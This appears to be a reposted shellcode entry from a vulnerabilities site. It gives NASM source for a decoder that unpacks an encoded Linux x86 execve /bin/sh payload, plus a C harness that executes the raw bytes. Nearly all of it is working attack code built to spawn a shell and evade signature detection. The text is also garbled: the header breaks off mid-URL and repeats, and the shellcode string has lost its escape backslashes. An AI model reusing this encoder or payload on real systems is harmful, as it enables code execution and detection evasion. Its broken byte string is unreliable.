/*
; Title : Execve /bin/sh Shellcode encoded with ROT-13 + RShift-2 + XOR
; Date : April, 2018
; Author : Nuno Freitas
; Blog Post : https://bufferoverflowed.wordp /*
; Title : Execve /bin/sh Shellcode encoded with ROT-13 + RShift-2 + XOR
; Date : April, 2018
; Author : Nuno Freitas
; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-shellcode-encoder/
; Twitter : @nunof11
; SLAE ID : SLAE-1112
; Size : 44 bytes
; Tested on : i686 GNU/Linux
NASM:
section .text
global _start
_start:
jmp short call_decoder
decoder:
pop esi ; pop the Shellcode address from the Stack
xor ecx, ecx
mov cl, shellcodelen ; Set the loop counter to shellcodelen
decode:
rol byte [esi], 0x2 ; Left Shift 2
xor byte [esi], cl ; XOR the byte with the ecx (counter)
sub byte [esi], 13 ; Undo ROT13
inc esi ; increment the offset (iterate over the bytes)
loop decode ; loop while zero flag not set
jmp short Shellcode
call_decoder:
call decoder ; Shellcode address will be pushed into the Stack
Shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23
shellcodelen equ $-Shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] =
"xebx12x5ex31xc9xb1x13xc0x06x02x30x0ex80x2ex0dx46xe2xf5xebx05xe8xe9xffxffxffx4bxf7x13x59xccx8cx63x5ex9fx8dx99x9fx1fxa4x3bx6exc6x36x23";
void main()
{
printf("Shellcode Length: %d
", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}
Linux x86 execve bin sh Encoded Shellcode
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 371